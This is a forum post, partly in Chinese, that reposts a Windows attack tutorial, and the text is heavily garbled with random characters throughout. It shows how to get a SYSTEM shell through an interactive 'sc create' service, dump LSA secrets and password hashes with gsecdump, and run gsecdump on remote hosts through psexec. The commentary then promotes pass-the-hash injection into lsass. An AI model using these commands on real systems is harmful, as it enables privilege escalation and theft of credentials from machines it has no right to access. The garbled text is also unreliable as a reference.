o get a DOS Prompt as NT system:
- G* R- i% [! d1 [. s! X4 N
' v5 w/ | B; O* NC:\>sc create shellcmdline binpath= "C:\WINDOWS\system32\cmd.exe /K start" type= own type= interact
/ s' l: o9 q( Y0 B$ N5 g, u. O[SC] CreateService SUCCESS
0 @4 h" l0 e3 \8 c1 @$ m
* N6 d- v* k1 T0 N: CC:\>sc start shellcmdline$ O; V2 U' N2 M! e
[SC] StartService FAILED 1053:
+ Q @5 v* e6 _; k# V# w! [1 O4 q6 H5 i
The service did not respond to the start or control request in a timely fashion.
# ^: U% ] t" W0 u" h7 C0 }$ P. {7 c- L* M% d2 i, d
C:\>sc delete shellcmdline
1 j" A7 m# w2 p' [% I$ u! P[SC] DeleteService SUCCESS: [: |# e& A5 b$ m; H
" G% t4 \2 z- n8 y" ]; R4 ~. R
------------# Z$ s: Z9 F8 O! ?
2 q- L& w% q+ [5 W/ u- R
Then in the new DOS window:# B5 l% K3 _# t4 O
5 F p D- I' a$ t, h1 y5 r" ]! b
Microsoft Windows XP [Version 5.1.2600]
2 A8 ]8 T/ _' o M6 w4 F& p(C) Copyright 1985-2001 Microsoft Corp.
6 X5 `7 q% G5 q" j1 S: ]/ m! G. o) x4 N' T
C:\WINDOWS\system32>whoami
9 q0 e* |& q; \* R2 s8 xNT AUTHORITY\SYSTEM
( z4 d9 q; Z( B8 u! w# w3 y0 c! L* m0 E a+ p
C:\WINDOWS\system32>gsecdump -h! ` I. A4 F: t |5 Z3 I' c* j9 F
gsecdump v0.6 by Johannes Gumbel (链接标记johannes.gumbel@truesec.se)2 \5 m8 ~, H5 _0 p5 M
usage: gsecdump [options]' r, I2 W( V a( _3 n( i
: Z, F' w5 t1 K. k; ^options:; M+ U3 k Q7 t& q6 w E1 j
-h [ --help ] show help( C3 J& Y1 l8 g; ?
-a [ --dump_all ] dump all secrets+ x8 A+ d' \( C; ^7 p2 a8 }9 f
-l [ --dump_lsa ] dump lsa secrets
2 k9 W) V! [. S. [4 g0 R& c1 Y6 Z-w [ --dump_wireless ] dump microsoft wireless connections, e1 W' i: h# G3 O
-u [ --dump_usedhashes ] dump hashes from active logon sessions4 l+ F8 {! m! Q6 v" W
-s [ --dump_hashes ] dump hashes from SAM/AD& S* |5 s. j: J* P
_( X) J; t! p# T! eAlthough I like to use:
1 s# N' N# C2 Q! z9 M$ N
' e$ D* X2 S. G5 z. w( y7 L! cPsExec v1.83 - Execute processes remotely
O' I2 G. u, B% Y, R+ ?) iCopyright (C) 2001-2007 Mark Russinovich
9 P+ m' v' _: e$ h3 j$ ~; }& P* }& pSysinternals - 链接标记[url]www.sysinternals.com[/url]
$ Y8 T6 G; @/ g! Z( L* f* U, n. j
: _ X$ h# n9 A8 d/ F. k- CC:\>psexec \\COMPUTER -u user -p password -s -f -c gsecdump.exe -u >Active-HASH.TXT7 J; S q& c8 A
N4 s$ N; e7 ~6 I# \6 q( q- j" ~to get the hashes from active logon sessions of a remote system.6 f6 Y/ @2 J# M0 y; Z5 z4 t7 R
: I" N5 W9 \3 o; F6 c1 b: eThese are a lot better than getting a cachedump of the Cached Credentials because these hashes are LMHashes that can be easily broken with Rainbow Tables.& m3 r8 [" S. |9 Z {2 _/ k
0 E: Q; t q- g$ {8 ^4 x4 H
提示一下,可以使用pshtools工具包中的iam,把刚才使用gsecdump抓取出来HASH信息导入本地的lsass进程,来实现hash注入式攻击,还是老外厉害,这下管理员有得忙了,ARP欺骗的时候获得的LM/NThash,还有gethash获得的,其实根本不用破解密码,这个就是利用工具了,原文说的好,不管密码是设置4位还是127位,只要有了hash,100%就能搞定了.: i- H! H" {/ D4 Y
原文出处:链接标记[url]http://truesecurity.se/blogs/mur ... -text-password.aspx[/url]
/ }) k1 G% i- B" h8 r; K
7 s- f8 ]1 W; Q, S我看了下原文出处,貌似是/2007/03/16/郁闷啊,差距。- F' E3 b; v1 ~7 \
|
发表于 2012-11-6 21:09:29
收藏
支持
反对